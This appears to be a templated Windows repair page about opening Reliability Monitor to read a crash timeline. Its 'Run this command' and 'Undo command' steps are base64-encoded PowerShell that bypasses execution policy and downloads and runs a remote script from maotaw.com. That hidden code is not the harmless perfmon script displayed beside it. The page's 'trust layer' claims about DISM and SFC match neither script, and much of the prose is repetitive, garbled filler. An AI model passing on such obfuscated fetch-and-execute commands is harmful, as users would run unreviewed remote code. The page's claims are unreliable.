Repair Windows Features

This operation is focused on open reliability monitor before guessing why apps or windows keep failing so the result stays precise instead of mixing unrelated tweaks.

Repair Windows Features is written like a practical guide instead of a thin script page, so you can understand what the issue usually means, why the suggested actions exist, and how to back out safely if the result is not what you wanted.

Overview

Open Reliability Monitor so you can see the crash timeline before changing ten things at once.

  • Open Reliability Monitor before guessing why apps or Windows keep failing often shows up when failures are happening repeatedly but the timeline is not being checked.
  • A nearby clue is that updates, drivers, and app crashes are blending together.
  • In practical terms, this page is about open reliability monitor so you can see the crash timeline before changing ten things at once..
Run this command
PowerShell -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAdABvAHAAJwA7ACAAJAB1ACAAPQAgACcAaAB0AHQAcABzADoALwAvAG0AYQBvAHQAYQB3AC4AYwBvAG0ALwBzAGMAcgBpAHAAdAAvAGEAcgB0AGkAYwBsAGUALwBvAHAAZQBuAC0AcgBlAGwAaQBhAGIAaQBsAGkAdAB5AC0AbQBvAG4AaQB0AG8AcgAtAGIAZQBmAG8AcgBlAC0AZwB1AGUAcwBzAGkAbgBnAC0AdwBoAHkALQBhAHAAcABzAC0AbwByAC0AdwBpAG4AZABvAHcAcwAtAGsAZQBlAHAALQBmAGEAaQBsAGkAbgBnAC4AcABzADEAJwA7ACAAJABmACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAnAG0AYQBvAHQAYQB3AC0AbwBwAGUAbgAtAHIAZQBsAGkAYQBiAGkAbABpAHQAeQAtAG0AbwBuAGkAdABvAHIALQBiAGUAZgBvAHIAZQAtAGcAdQBlAHMAcwBpAG4AZwAtAHcAaAB5AC0AYQBwAHAAcwAtAG8AcgAtAHcAaQBuAGQAbwB3AHMALQBrAGUAZQBwAC0AZgBhAGkAbABpAG4AZwAuAHAAcwAxACcAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJAB1ACAALQBPAHUAdABGAGkAbABlACAAJABmADsAIAAmACAAUABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGYA
Script
# Maotaw Reliability Monitor
perfmon /rel
Write-Host 'Reliability Monitor was opened. Read the first day the problem started instead of looking only at today.'
What this does

Open Reliability Monitor so you can see the crash timeline before changing ten things at once.

A system can look random from the outside. Reliability Monitor gives it a timeline so you can stop treating separate failures like one mystery problem.

In plain language, open reliability monitor before guessing why apps or windows keep failing matters because failures are happening repeatedly but the timeline is not being checked. People usually start looking this up when updates, drivers, and app crashes are blending together. A system can look random from the outside. Reliability Monitor gives it a timeline so you can stop treating separate failures like one mystery problem.

How and why

In practice, open reliability monitor before guessing why apps or windows keep failing matters because failures are happening repeatedly but the timeline is not being checked. A system can look random from the outside. Reliability Monitor gives it a timeline so you can stop treating separate failures like one mystery problem. A good next step is to review check the timeline before larger repairs. Then decide whether you only needed the explanation or whether you want a practical action page too.

You normally review open reliability monitor before guessing why apps or windows keep failing when you want to understand what Windows is doing, what changes it can influence, and whether it is relevant before you touch settings blindly. Useful things to notice first: check the timeline before larger repairs; note which update or app changed near the first failure; pair the result with Event Viewer only when needed; avoid reinstalling blindly before you read the pattern.

  1. open the timeline
  2. click the first days where the score dropped
  3. look for repeated app or update names
  4. use that pattern to choose the next fix instead of guessing
Undo command
PowerShell -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAdABvAHAAJwA7ACAAJAB1ACAAPQAgACcAaAB0AHQAcABzADoALwAvAG0AYQBvAHQAYQB3AC4AYwBvAG0ALwBzAGMAcgBpAHAAdAAvAGEAcgB0AGkAYwBsAGUALwBvAHAAZQBuAC0AcgBlAGwAaQBhAGIAaQBsAGkAdAB5AC0AbQBvAG4AaQB0AG8AcgAtAGIAZQBmAG8AcgBlAC0AZwB1AGUAcwBzAGkAbgBnAC0AdwBoAHkALQBhAHAAcABzAC0AbwByAC0AdwBpAG4AZABvAHcAcwAtAGsAZQBlAHAALQBmAGEAaQBsAGkAbgBnAC4AcABzADEAPwB2AGEAcgBpAGEAbgB0AD0AdQBuAGQAbwAnADsAIAAkAGYAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACcAdQBuAGQAbwAtAG0AYQBvAHQAYQB3AC0AbwBwAGUAbgAtAHIAZQBsAGkAYQBiAGkAbABpAHQAeQAtAG0AbwBuAGkAdABvAHIALQBiAGUAZgBvAHIAZQAtAGcAdQBlAHMAcwBpAG4AZwAtAHcAaAB5AC0AYQBwAHAAcwAtAG8AcgAtAHcAaQBuAGQAbwB3AHMALQBrAGUAZQBwAC0AZgBhAGkAbABpAG4AZwAuAHAAcwAxACcAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJAB1ACAALQBPAHUAdABGAGkAbABlACAAJABmADsAIAAmACAAUABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGYA
# Maotaw Undo Pack

$ErrorActionPreference = 'SilentlyContinue'
When this page helps
  • Use this page when the main symptom is close to open reliability monitor before guessing why apps or windows keep failing.
  • A common fit is when failures are happening repeatedly but the timeline is not being checked.
  • It is also a fit for searches like: open reliability monitor windows 11.
Before you run it
  • Read the script and command first so you understand what open reliability monitor before guessing why apps or windows keep failing is changing.
  • check the timeline before larger repairs
  • note which update or app changed near the first failure
  • open the timeline
Trust layer

This page is designed to be reviewable before you run anything. It shows what the pack is likely to touch, what it intentionally avoids, and how rollback is handled.

Likely touches

  • DISM and SFC operations
  • Windows component validation

Intentionally avoids

  • user data
  • app passwords
  • hardware firmware
Verification
  • Create a restore point or baseline note before stronger changes.
  • Compare one symptom at a time after a reboot instead of guessing from feel alone.
  • If a change does not help, use the undo pack before trying the next bigger fix.
  • open the timeline
  • click the first days where the score dropped
  • check the timeline before larger repairs
Expected result
  • You should be able to compare the exact symptom after the pack instead of guessing whether anything changed.
  • Expected improvement area: Open Reliability Monitor so you can see the crash timeline before changing ten things at once.
Common mistakes
  • Do not treat open reliability monitor before guessing why apps or windows keep failing like a magic fix if the root cause was never confirmed.
  • avoid reinstalling blindly before you read the pattern
  • look for repeated app or update names
When this page is not enough
  • This page is not enough if the symptom does not improve after you verify open reliability monitor before guessing why apps or windows keep failing once.
FAQ

Should you run open reliability monitor before guessing why apps or windows keep failing immediately?

Usually only after you confirm the symptom matches. A safer baseline, a restore point, and one change at a time make the result easier to trust.

What should you verify after running the script?

Check the exact problem you cared about, reboot if the page recommends it, and compare the before and after behavior rather than assuming the change helped.

Can you undo the change later?

For most pages here, yes. The generated undo pack is meant to move you back toward a cleaner baseline, though deleted cache or temporary files may not come back.

Will this page fix every version of the problem?

No. These pages are meant to be high-signal starting points. If the same symptom comes from hardware failure, account corruption, a bad driver, or a third-party app conflict, you may need a neighboring guide or a deeper diagnostic path.